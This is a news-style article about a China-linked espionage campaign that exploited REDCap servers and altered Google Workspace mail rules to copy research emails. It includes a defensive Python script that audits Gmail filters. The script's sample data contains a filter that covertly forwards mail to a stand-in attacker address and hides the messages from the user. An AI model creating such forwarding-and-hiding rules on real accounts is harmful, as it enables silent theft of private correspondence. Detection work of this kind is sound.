Chinese Hackers Use Google Workspace for Espionage
A China-linked espionage group has operated for over a year within North American medical, academic, and military research networks. The attackers exploited a vulnerability in the REDCap research systems to gain access to sensitive emails. These attacks aimed to steal confidential information of significance to national security. The hackers infiltrated the networks unnoticed by installing a backdoor on the REDCap servers, which allowed them to steal login credentials from researchers and staff.
The attackers were able to access email accounts critical for conducting research projects and military studies. A particularly notable aspect of the attacks was the method of data exfiltration. The hackers modified the victims' Google Workspace rules to copy all incoming and outgoing messages. This technique enabled them to collect a large amount of data without the victims noticing. The affected institutions included both academic facilities and military research organizations.
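The exfiltration technique described above relies on mail rules the victim rarely looks at. The following is an added example, not code from the article or from Google: it audits filter objects in the shape returned by the Gmail API method users.settings.filters.list and flags rules that forward mail to an address outside the organisation's domain or that remove the INBOX/UNREAD labels so the copied messages never draw the user's attention. The organisation domain and the sample filters are constructed for illustration.

```python
"""Audit Gmail filter rules for covert forwarding or hiding of mail.

Added example; the filter dictionaries follow the Gmail API filter resource
(fields id, criteria, action.forward, action.addLabelIds, action.removeLabelIds).
ORG_DOMAIN and SAMPLE_FILTERS are assumptions constructed for this example.
"""
from dataclasses import dataclass, field
from typing import Any, Optional

ORG_DOMAIN = "example.edu"            # assumed organisation domain (placeholder)
HIDING_LABELS = {"INBOX", "UNREAD"}   # removing these archives or auto-reads mail

# Constructed sample: what a defender gets back from
# GET /gmail/v1/users/{userId}/settings/filters (the "filter" array).
SAMPLE_FILTERS: list[dict[str, Any]] = [
    {   # benign: only applies a label to newsletters
        "id": "flt-benign",
        "criteria": {"from": "newsletter@example.edu"},
        "action": {"addLabelIds": ["Label_12"]},
    },
    {   # suspicious: matches everything addressed to the user, copies it
        # to an external mailbox and hides the matched messages
        "id": "flt-suspect",
        "criteria": {"to": "researcher@example.edu"},
        "action": {"forward": "archive@attacker-controlled.example",
                   "removeLabelIds": ["INBOX", "UNREAD"]},
    },
    {   # internal forwarding: lower risk but still worth reviewing
        "id": "flt-internal",
        "criteria": {"subject": "grant"},
        "action": {"forward": "assistant@example.edu"},
    },
    {   # hides security notifications without forwarding
        "id": "flt-hide",
        "criteria": {"from": "no-reply@accounts.example.edu"},
        "action": {"removeLabelIds": ["INBOX"]},
    },
]


@dataclass
class Finding:
    filter_id: str
    severity: str                  # "high", "medium" or "low"
    forward_to: Optional[str]
    reasons: list[str] = field(default_factory=list)


def audit_filters(filters: list[dict[str, Any]],
                  org_domain: str = ORG_DOMAIN) -> list[Finding]:
    """Return one Finding per filter that forwards mail or hides matched mail.

    Severity: external forward -> high, internal forward -> medium,
    hiding only (no forward) -> low.
    """
    findings: list[Finding] = []
    for flt in filters:
        action = flt.get("action", {})
        reasons: list[str] = []
        severity = "low"

        fwd = action.get("forward")
        if fwd:
            domain = fwd.rsplit("@", 1)[-1].lower()
            if domain != org_domain.lower():
                severity = "high"
                reasons.append(f"forwards matched mail to external domain {domain}")
            else:
                severity = "medium"
                reasons.append(f"forwards matched mail to internal address {fwd}")

        hidden = HIDING_LABELS & set(action.get("removeLabelIds", []))
        if hidden:
            reasons.append("removes " + ", ".join(sorted(hidden))
                           + " (matched mail is hidden from the user)")

        if reasons:
            findings.append(Finding(flt.get("id", "?"), severity, fwd, reasons))
    return findings


if __name__ == "__main__":
    for finding in audit_filters(SAMPLE_FILTERS):
        print(f"[{finding.severity.upper()}] filter {finding.filter_id}: "
              + "; ".join(finding.reasons))
```

In a real review the same check should be run across every mailbox via a service account with domain-wide delegation, and combined with the separate forwarding-address list (users.settings.forwardingAddresses) and the admin audit log, since a rule created by the attacker looks identical to one created by the user and only its creation time and origin tell them apart.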
Attackers focused on sensitive research projects that could potentially provide strategic advantages for China. This type of cyberattack poses a serious threat to national security. Security agencies in North America have identified these incidents as part of a larger pattern of cyberattacks originating from state-sponsored groups. These attacks often target critical infrastructures and research data that are vital for the development of new technologies. The discovery of these attacks has led to increased collaboration between security agencies and the affected institutions.
The response to these attacks includes reviewing and improving security protocols in the affected networks. Experts recommend that organizations regularly check their systems for vulnerabilities and ensure that all employees are aware of the risks of phishing and other cyberattacks. The implementation of multi-factor authentication procedures is also deemed necessary. The incidents raise questions about the security of cloud services, particularly regarding the use of Google Workspace in sensitive areas. The possibility that attackers can manipulate internal rules to steal data has raised concerns about the integrity of such platforms.
Security researchers are calling for a comprehensive review of the security architecture of cloud services. The incidents have been documented by various security research groups that have analyzed the techniques and tactics of the attackers. This information is crucial for preventing future attacks and improving the security landscape in the affected sectors. However, the exact number of affected emails and data remains unclear. The vulnerability exploited by the attackers is an example of the increasing complexity and sophistication of modern cyberattacks.
The attackers exploited not only technical weaknesses but also human error to achieve their goals. The discovery of these attacks could lead to a reassessment of security strategies in many organizations. The incidents were first made public in May 2026, when security researchers analyzed the attacks and informed the affected institutions. Investigations are ongoing, and further details about the attackers and their methods are expected to emerge. Security agencies warn that similar attacks are likely in the future.